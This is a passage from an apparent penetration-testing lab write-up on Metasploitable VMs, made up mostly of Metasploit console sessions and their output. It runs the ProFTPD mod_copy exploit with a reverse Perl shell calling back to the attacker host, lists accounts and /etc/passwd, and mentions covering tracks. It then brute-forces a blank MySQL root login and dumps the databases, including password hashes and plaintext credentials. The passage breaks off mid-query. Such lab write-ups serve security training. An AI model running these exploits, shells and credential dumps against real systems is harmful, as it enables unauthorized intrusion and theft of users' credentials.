0 exploit/linux/misc/netsupport_manager_agent 2011-01-08 average No NetSupport Manager Agent Remote Buffer Overflow
1 exploit/linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
2 exploit/freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
3 exploit/linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
4 exploit/unix/ftp/proftpd_modcopy_exec 2015-04-22 excellent Yes ProFTPD 1.3.5 Mod_Copy Command Execution
5 exploit/unix/ftp/proftpd_133c_backdoor 2010-12-02 excellent No ProFTPD-1.3.3c Backdoor Command Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/ftp/proftpd_133c_backdoor
msf6 > use 4
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > options
Module options (exploit/unix/ftp/proftpd_modcopy_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes HTTP port (TCP)
RPORT_FTP 21 yes FTP port
SITEPATH /var/www yes Absolute writable website path
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path to the website
TMPPATH /tmp yes Absolute writable path
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 ProFTPD 1.3.5
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set RHOSTS 192.168.56.106
RHOSTS => 192.168.56.106
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set SITEPATH /var/www/html
SITEPATH => /var/www/html
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set LHOST 192.168.56.104
LHOST => 192.168.56.104
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 192.168.56.104:4444
[*] 192.168.56.106:80 - 192.168.56.106:21 - Connected to FTP server
[*] 192.168.56.106:80 - 192.168.56.106:21 - Sending copy commands to FTP server
[*] 192.168.56.106:80 - Executing PHP payload /Zt2Xir.php
[*] Command shell session 3 opened (192.168.56.104:4444 -> 192.168.56.106:49173) at 2021-09-17 14:25:01 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
hostname
metasploitable3-ub1404
ls /home
anakin_skywalker
artoo_detoo
ben_kenobi
boba_fett
c_three_pio
chewbacca
darth_vader
greedo
han_solo
jabba_hutt
jarjar_binks
kylo_ren
lando_calrissian
leia_organa
luke_skywalker
vagrant
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
id vagrant
uid=900(vagrant) gid=900(vagrant) groups=900(vagrant),27(sudo)
id luke_skywalker
uid=1112(luke_skywalker) gid=100(users) groups=100(users),27(sudo)
id leia_organa
uid=1111(leia_organa) gid=100(users) groups=100(users),27(sudo)
id lando_calrissian
uid=1120(lando_calrissian) gid=100(users) groups=100(users)
id kylo_ren
uid=1125(kylo_ren) gid=100(users) groups=100(users)
id darth_vader
uid=1117(darth_vader) gid=100(users) groups=100(users)
id anakin_skywalker
uid=1118(anakin_skywalker) gid=100(users) groups=100(users)
id han_solo
uid=1113(han_solo) gid=100(users) groups=100(users),27(sudo)
id greedo
uid=1123(greedo) gid=100(users) groups=100(users),999(docker)
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
statd:x:104:65534::/var/lib/nfs:/bin/false
vagrant:x:900:900:vagrant,,,:/home/vagrant:/bin/bash
dirmngr:x:105:111::/var/cache/dirmngr:/bin/sh
leia_organa:x:1111:100::/home/leia_organa:/bin/bash
luke_skywalker:x:1112:100::/home/luke_skywalker:/bin/bash
han_solo:x:1113:100::/home/han_solo:/bin/bash
artoo_detoo:x:1114:100::/home/artoo_detoo:/bin/bash
c_three_pio:x:1115:100::/home/c_three_pio:/bin/bash
ben_kenobi:x:1116:100::/home/ben_kenobi:/bin/bash
darth_vader:x:1117:100::/home/darth_vader:/bin/bash
anakin_skywalker:x:1118:100::/home/anakin_skywalker:/bin/bash
jarjar_binks:x:1119:100::/home/jarjar_binks:/bin/bash
lando_calrissian:x:1120:100::/home/lando_calrissian:/bin/bash
boba_fett:x:1121:100::/home/boba_fett:/bin/bash
jabba_hutt:x:1122:100::/home/jabba_hutt:/bin/bash
greedo:x:1123:100::/home/greedo:/bin/bash
chewbacca:x:1124:100::/home/chewbacca:/bin/bash
kylo_ren:x:1125:100::/home/kylo_ren:/bin/bash
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
avahi:x:107:114:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:108:116:colord colour management daemon,,,:/var/lib/colord:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
ls
8xed2.php
PFy479.php
Zt2Xir.php
chat
drupal
payroll_app.php
phpmyadmin
sYRf3g.php
^C
Abort session 2? [y/N] y
[*] 192.168.56.106 - Command shell session 2 closed. Reason: User exit
msf6 exploit(unix/ftp/proftpd_modcopy_exec) >Aleatory listing the different users, there are a handful that are part of the sudo group, meaning they have elevated privileges. As the command shell opens as www-data, the default user for handling web servers and websites, it does not have elevated privileges, but is allowed to look around the default installation of the website within the var/www/html directory.
One thing to note, is that the exploit executes a PHP payload, i.e. a .php file, that will have to be removed later on to cover the tracks of the attacker during the Covering Tracks section.
Gaining Persistence
After gaining access to the machines, find a way to have continuous access to verify that even if the vulnerability exploited, the machine can still be accessed.
Metasploitable 2
As shown in the scan, the Metasploitable 2 machine has a MySQL service running on port 3306. Previously, accessed was gained with the superuser credentials. Can these credentials be used to access the MySQL databases as superuser too? Test it out.
msf6 > search mysql
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/capture/mysql normal No Authentication Capture: MySQL
1 exploit/windows/http/cayin_xpost_sql_rce 2020-06-04 excellent Yes Cayin xPost wayfinder_seqid SQLi to RCE
2 auxiliary/gather/joomla_weblinks_sqli 2014-03-02 normal Yes Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
3 exploit/unix/webapp/kimai_sqli 2013-05-21 average Yes Kimai v0.9.2 'db_restore.php' SQL Injection
4 exploit/linux/http/librenms_collectd_cmd_inject 2019-07-15 excellent Yes LibreNMS Collectd Command Injection
5 post/linux/gather/enum_configs normal No Linux Gather Configurations
6 post/linux/gather/enum_users_history normal No Linux Gather User History
7 auxiliary/scanner/mysql/mysql_writable_dirs normal No MYSQL Directory Write Test
8 auxiliary/scanner/mysql/mysql_file_enum normal No MYSQL File/Directory Enumerator
9 auxiliary/scanner/mysql/mysql_hashdump normal No MYSQL Password Hashdump
10 auxiliary/scanner/mysql/mysql_schemadump normal No MYSQL Schema Dump
11 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
12 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
13 post/multi/manage/dbvis_add_db_admin normal No Multi Manage DbVisualizer Add Db Admin
14 auxiliary/scanner/mysql/mysql_authbypass_hashdump 2012-06-09 normal No MySQL Authentication Bypass Password Dump
15 auxiliary/admin/mysql/mysql_enum normal No MySQL Enumeration Module
16 auxiliary/scanner/mysql/mysql_login normal No MySQL Login Utility
17 auxiliary/admin/mysql/mysql_sql normal No MySQL SQL Generic Query
18 auxiliary/scanner/mysql/mysql_version normal No MySQL Server Version Enumeration
19 exploit/linux/mysql/mysql_yassl_getname 2010-01-25 good No MySQL yaSSL CertDecoder::GetName Buffer Overflow
20 exploit/linux/mysql/mysql_yassl_hello 2008-01-04 good No MySQL yaSSL SSL Hello Message Buffer Overflow
21 exploit/windows/mysql/mysql_yassl_hello 2008-01-04 average No MySQL yaSSL SSL Hello Message Buffer Overflow
22 exploit/multi/mysql/mysql_udf_payload 2009-01-16 excellent No Oracle MySQL UDF Payload Execution
23 exploit/windows/mysql/mysql_start_up 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows FILE Privilege Abuse
24 exploit/windows/mysql/mysql_mof 2012-12-01 excellent Yes Oracle MySQL for Microsoft Windows MOF Execution
25 exploit/linux/http/pandora_fms_events_exec 2020-06-04 excellent Yes Pandora FMS Events Remote Command Execution
26 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
27 exploit/windows/mysql/scrutinizer_upload_exec 2012-07-27 excellent Yes Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
28 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
29 auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal No TikiWiki Information Disclosure
30 exploit/multi/http/wp_db_backup_rce 2019-04-24 excellent Yes WP Database Backup RCE
31 exploit/unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure
32 exploit/multi/http/zpanel_information_disclosure_rce 2014-01-30 excellent No Zpanel Remote Unauthenticated RCE
Interact with a module by name or index. For example info 32, use 32 or use exploit/multi/http/zpanel_information_disclosure_rce
msf6 > use 16
msf6 auxiliary(scanner/mysql/mysql_login) > options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
msf6 auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.56.101:3306 - 192.168.56.101:3306 - Found remote MySQL version 5.0.51a
[!] 192.168.56.101:3306 - No active DB -- Credential data will not be saved!
[+] 192.168.56.101:3306 - 192.168.56.101:3306 - Success: 'root:'
[*] 192.168.56.101:3306 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/mysql/mysql_login) > mysql -u root -p -h 192.168.56.101
[*] exec: mysql -u root -p -h 192.168.56.101
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 21
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.002 sec)
MySQL [(none)]> use information_schema;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [information_schema]> show tables;
+---------------------------------------+
| Tables_in_information_schema |
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| KEY_COLUMN_USAGE |
| PROFILING |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+
17 rows in set (0.001 sec)
MySQL [information_schema]> use dvwa;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [dvwa]> show tables;
+----------------+
| Tables_in_dvwa |
+----------------+
| guestbook |
| users |
+----------------+
2 rows in set (0.001 sec)
MySQL [dvwa]> select * from users;
+---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+
| user_id | first_name | last_name | user | password | avatar |
+---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+
| 1 | admin | admin | admin | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/admin.jpg |
| 2 | Gordon | Brown | gordonb | e99a18c428cb38d5f260853678922e03 | http://172.16.123.129/dvwa/hackable/users/gordonb.jpg |
| 3 | Hack | Me | 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b | http://172.16.123.129/dvwa/hackable/users/1337.jpg |
| 4 | Pablo | Picasso | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 | http://172.16.123.129/dvwa/hackable/users/pablo.jpg |
| 5 | Bob | Smith | smithy | 5f4dcc3b5aa765d61d8327deb882cf99 | http://172.16.123.129/dvwa/hackable/users/smithy.jpg |
+---------+------------+-----------+---------+----------------------------------+-------------------------------------------------------+
5 rows in set (0.011 sec)
MySQL [dvwa]> select * from guestbook;
+------------+-------------------------+------+
| comment_id | comment | name |
+------------+-------------------------+------+
| 1 | This is a test comment. | test |
+------------+-------------------------+------+
1 row in set (0.002 sec)
MySQL [dvwa]> use metasploit;
Database changed
MySQL [metasploit]> show tables;
Empty set (0.001 sec)
MySQL [metasploit]> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [mysql]> show tables;
+---------------------------+
| Tables_in_mysql |
+---------------------------+
| columns_priv |
| db |
| func |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| proc |
| procs_priv |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
| user |
+---------------------------+
17 rows in set (0.002 sec)
MySQL [mysql]> select * from user;
+------+------------------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections |
+------+------------------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+
| | debian-sys-maint | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 |
| % | root | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | Y | | | 0 | 0 | 0 | 0 |
| % | guest | | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | Y | | | 0 | 0 | 0 | 0 |
+------+------------------+----------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+
3 rows in set (0.002 sec)
MySQL [mysql]> use owasp10;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [owasp10]> show tables;
+-------------------+
| Tables_in_owasp10 |
+-------------------+
| accounts |
| blogs_table |
| captured_data |
| credit_cards |
| hitlog |
| pen_test_tools |
+-------------------+
6 rows in set (0.002 sec)
MySQL [owasp10]> select * from accounts;
+-----+----------+--------------+-----------------------------+----------+
| cid | username | password | mysignature | is_admin |
+-----+----------+--------------+-----------------------------+----------+
| 1 | admin | adminpass | Monkey! | TRUE |
| 2 | adrian | somepassword | Zombie Films Rock! | TRUE |
| 3 | john | monkey | I like the smell of confunk | FALSE |
| 4 | jeremy | password | d1373 1337 speak | FALSE |
| 5 | bryce | password | I Love SANS | FALSE |
| 6 | samurai | samurai | Carving Fools | FALSE |
| 7 | jim | password | Jim Rome is Burning | FALSE |
| 8 | bobby | password | Hank is my dad | FALSE |
| 9 | simba | password | I am a cat | FALSE |
| 10 | dreveil | password | Preparation H | FALSE |
| 11 | scotty | password | Scotty Do | FALSE |
| 12 | cal | password | Go Wildcats | FALSE |
| 13 | john | password | Do the Duggie! | FALSE |
| 14 | kevin | 42 | Doug Adams rocks | FALSE |
| 15 | dave | set | Bet on S.E.T. FTW | FALSE |
| 16 | ed | pentest | Commandline KungFu anyone? | FALSE |
+-----+----------+--------------+-----------------------------+----------+
16 rows in set (0.024 sec)
MySQL [owasp10]> use tikiwiki;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [tikiwiki]> show tables;
+------------------------------------+
| Tables_in_tikiwiki |
+------------------------------------+
| galaxia_activities |
| galaxia_activity_roles |
| galaxia_instance_activities |
| galaxia_instance_comments |
| galaxia_instances |
| galaxia_processes |
| galaxia_roles |
| galaxia_transitions |
| galaxia_user_roles |
| galaxia_workitems |
| messu_archive |
| messu_messages |
| messu_sent |
| sessions |
| tiki_actionlog |
| tiki_article_types |
| tiki_articles |
| tiki_banners |
| tiki_banning |
| tiki_banning_sections |
| tiki_blog_activity |
| tiki_blog_posts |
| tiki_blog_posts_images |
| tiki_blogs |
| tiki_calendar_categories |
| tiki_calendar_items |
| tiki_calendar_locations |
| tiki_calendar_roles |
| tiki_calendars |
| tiki_categories |
| tiki_categorized_objects |
| tiki_category_objects |
| tiki_category_sites |
| tiki_chart_items |
| tiki_charts |
| tiki_charts_rankings |
| tiki_charts_votes |
| tiki_chat_channels |
| tiki_chat_messages |
| tiki_chat_users |
| tiki_comments |
| tiki_content |
| tiki_content_templates |
| tiki_content_templates_sections |
| tiki_cookies |
| tiki_copyrights |
| tiki_directory_categories |
| tiki_directory_search |
| tiki_directory_sites |
| tiki_download |
| tiki_drawings |
| tiki_dsn |
| tiki_dynamic_variables |
| tiki_eph |
| tiki_extwiki |
| tiki_faq_questions |
| tiki_faqs |
| tiki_featured_links |
| tiki_file_galleries |
| tiki_file_handlers |
| tiki_files |
| tiki_forum_attachments |
| tiki_forum_reads |
| tiki_forums |
| tiki_forums_queue |
| tiki_forums_reported |
| tiki_friends |
| tiki_friendship_requests |
| tiki_galleries |
| tiki_galleries_scales |
| tiki_games |
| tiki_group_inclusion |
| tiki_history |
| tiki_hotwords |
| tiki_html_pages |
| tiki_html_pages_dynamic_zones |
| tiki_images |
| tiki_images_data |
| tiki_integrator_reps |
| tiki_integrator_rules |
| tiki_language |
| tiki_languages |
| tiki_link_cache |
| tiki_links |
| tiki_live_support_events |
| tiki_live_support_message_comments |
| tiki_live_support_messages |
| tiki_live_support_modules |
| tiki_live_support_operators |
| tiki_live_support_requests |
| tiki_logs |
| tiki_mail_events |
| tiki_mailin_accounts |
| tiki_menu_languages |
| tiki_menu_options |
| tiki_menus |
| tiki_minical_events |
| tiki_minical_topics |
| tiki_modules |
| tiki_newsletter_groups |
| tiki_newsletter_subscriptions |
| tiki_newsletters |
| tiki_newsreader_marks |
| tiki_newsreader_servers |
| tiki_object_ratings |
| tiki_page_footnotes |
| tiki_pages |
| tiki_pageviews |
| tiki_poll_objects |
| tiki_poll_options |
| tiki_polls |
| tiki_preferences |
| tiki_private_messages |
| tiki_programmed_content |
| tiki_quicktags |
| tiki_quiz_question_options |
| tiki_quiz_questions |
| tiki_quiz_results |
| tiki_quiz_stats |
| tiki_quiz_stats_sum |
| tiki_quizzes |
| tiki_received_articles |
| tiki_received_pages |
| tiki_referer_stats |
| tiki_related_categories |
| tiki_rss_feeds |
| tiki_rss_modules |
| tiki_score |
| tiki_search_stats |
| tiki_searchindex |
| tiki_searchsyllable |
| tiki_searchwords |
| tiki_secdb |
| tiki_semaphores |
| tiki_sent_newsletters |
| tiki_sessions |
| tiki_sheet_layout |
| tiki_sheet_values |
| tiki_sheets |
| tiki_shoutbox |
| tiki_shoutbox_words |
| tiki_stats |
| tiki_structure_versions |
| tiki_structures |
| tiki_submissions |
| tiki_suggested_faq_questions |
| tiki_survey_question_options |
| tiki_survey_questions |
| tiki_surveys |
| tiki_tags |
| tiki_theme_control_categs |
| tiki_theme_control_objects |
| tiki_theme_control_sections |
| tiki_topics |
| tiki_tracker_fields |
| tiki_tracker_item_attachments |
| tiki_tracker_item_comments |
| tiki_tracker_item_fields |
| tiki_tracker_items |
| tiki_tracker_options |
| tiki_trackers |
| tiki_translated_objects |
| tiki_untranslated |
| tiki_user_answers |
| tiki_user_answers_uploads |
| tiki_user_assigned_modules |
| tiki_user_bookmarks_folders |
| tiki_user_bookmarks_urls |
| tiki_user_mail_accounts |
| tiki_user_menus |
| tiki_user_modules |
| tiki_user_notes |
| tiki_user_postings |
| tiki_user_preferences |
| tiki_user_quizzes |
| tiki_user_taken_quizzes |
| tiki_user_tasks |
| tiki_user_tasks_history |
| tiki_user_votings |
| tiki_user_watches |
| tiki_userfiles |
| tiki_userpoints |
| tiki_users |
| tiki_users_score |
| tiki_webmail_contacts |
| tiki_webmail_messages |
| tiki_wiki_attachments |
| tiki_zones |
| users_grouppermissions |
| users_groups |
| users_objectpermissions |
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.003 sec)
MySQL [tikiwiki]> select * from tiki_users;
Empty set (0.001 sec)
MySQL [tikiwiki]> select * from users_users;
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+-------+
| userId | email | login | password | provpass | default_group | lastLogin | currentLogin | registrationDate | challenge | pass_due | hash | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score | valid |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+-------+
| 1 | | admin | admin | NULL | NULL | NULL | NULL | NULL | NULL | NULL | f6fdffe48c908deb0f4c3bd36c032e72 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 | NULL |
+--------+-------+-------+----------+----------+---------------+-----------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+-------+
1 row in set (0.016 sec)
MySQL [tikiwiki]> use tikiwiki195;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [tikiwiki195]> show tables;
+------------------------------------+
| Tables_in_tikiwiki195 |
+------------------------------------+
| galaxia_activities |
| galaxia_activity_roles |
| galaxia_instance_activities |
| galaxia_instance_comments |
| galaxia_instances |
| galaxia_processes |
| galaxia_roles |
| galaxia_transitions |
| galaxia_user_roles |
| galaxia_workitems |
| messu_archive |
| messu_messages |
| messu_sent |
| sessions |
| tiki_actionlog |
| tiki_article_types |
| tiki_articles |
| tiki_banners |
| tiki_banning |
| tiki_banning_sections |
| tiki_blog_activity |
| tiki_blog_posts |
| tiki_blog_posts_images |
| tiki_blogs |
| tiki_calendar_categories |
| tiki_calendar_items |
| tiki_calendar_locations |
| tiki_calendar_roles |
| tiki_calendars |
| tiki_categories |
| tiki_categorized_objects |
| tiki_category_objects |
| tiki_category_sites |
| tiki_chart_items |
| tiki_charts |
| tiki_charts_rankings |
| tiki_charts_votes |
| tiki_chat_channels |
| tiki_chat_messages |
| tiki_chat_users |
| tiki_comments |
| tiki_content |
| tiki_content_templates |
| tiki_content_templates_sections |
| tiki_cookies |
| tiki_copyrights |
| tiki_directory_categories |
| tiki_directory_search |
| tiki_directory_sites |
| tiki_download |
| tiki_drawings |
| tiki_dsn |
| tiki_dynamic_variables |
| tiki_eph |
| tiki_extwiki |
| tiki_faq_questions |
| tiki_faqs |
| tiki_featured_links |
| tiki_file_galleries |
| tiki_file_handlers |
| tiki_files |
| tiki_forum_attachments |
| tiki_forum_reads |
| tiki_forums |
| tiki_forums_queue |
| tiki_forums_reported |
| tiki_friends |
| tiki_friendship_requests |
| tiki_galleries |
| tiki_galleries_scales |
| tiki_games |
| tiki_group_inclusion |
| tiki_history |
| tiki_hotwords |
| tiki_html_pages |
| tiki_html_pages_dynamic_zones |
| tiki_images |
| tiki_images_data |
| tiki_integrator_reps |
| tiki_integrator_rules |
| tiki_language |
| tiki_languages |
| tiki_link_cache |
| tiki_links |
| tiki_live_support_events |
| tiki_live_support_message_comments |
| tiki_live_support_messages |
| tiki_live_support_modules |
| tiki_live_support_operators |
| tiki_live_support_requests |
| tiki_logs |
| tiki_mail_events |
| tiki_mailin_accounts |
| tiki_menu_languages |
| tiki_menu_options |
| tiki_menus |
| tiki_minical_events |
| tiki_minical_topics |
| tiki_modules |
| tiki_newsletter_groups |
| tiki_newsletter_subscriptions |
| tiki_newsletters |
| tiki_newsreader_marks |
| tiki_newsreader_servers |
| tiki_object_ratings |
| tiki_page_footnotes |
| tiki_pages |
| tiki_pageviews |
| tiki_poll_objects |
| tiki_poll_options |
| tiki_polls |
| tiki_preferences |
| tiki_private_messages |
| tiki_programmed_content |
| tiki_quicktags |
| tiki_quiz_question_options |
| tiki_quiz_questions |
| tiki_quiz_results |
| tiki_quiz_stats |
| tiki_quiz_stats_sum |
| tiki_quizzes |
| tiki_received_articles |
| tiki_received_pages |
| tiki_referer_stats |
| tiki_related_categories |
| tiki_rss_feeds |
| tiki_rss_modules |
| tiki_score |
| tiki_search_stats |
| tiki_searchindex |
| tiki_searchsyllable |
| tiki_searchwords |
| tiki_secdb |
| tiki_semaphores |
| tiki_sent_newsletters |
| tiki_sessions |
| tiki_sheet_layout |
| tiki_sheet_values |
| tiki_sheets |
| tiki_shoutbox |
| tiki_shoutbox_words |
| tiki_stats |
| tiki_structure_versions |
| tiki_structures |
| tiki_submissions |
| tiki_suggested_faq_questions |
| tiki_survey_question_options |
| tiki_survey_questions |
| tiki_surveys |
| tiki_tags |
| tiki_theme_control_categs |
| tiki_theme_control_objects |
| tiki_theme_control_sections |
| tiki_topics |
| tiki_tracker_fields |
| tiki_tracker_item_attachments |
| tiki_tracker_item_comments |
| tiki_tracker_item_fields |
| tiki_tracker_items |
| tiki_tracker_options |
| tiki_trackers |
| tiki_translated_objects |
| tiki_untranslated |
| tiki_user_answers |
| tiki_user_answers_uploads |
| tiki_user_assigned_modules |
| tiki_user_bookmarks_folders |
| tiki_user_bookmarks_urls |
| tiki_user_mail_accounts |
| tiki_user_menus |
| tiki_user_modules |
| tiki_user_notes |
| tiki_user_postings |
| tiki_user_preferences |
| tiki_user_quizzes |
| tiki_user_taken_quizzes |
| tiki_user_tasks |
| tiki_user_tasks_history |
| tiki_user_votings |
| tiki_user_watches |
| tiki_userfiles |
| tiki_userpoints |
| tiki_users |
| tiki_users_score |
| tiki_webmail_contacts |
| tiki_webmail_messages |
| tiki_wiki_attachments |
| tiki_zones |
| users_grouppermissions |
| users_groups |
| users_objectpermissions |
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.003 sec)
MySQL [tikiwiki195]> select * from users_users;
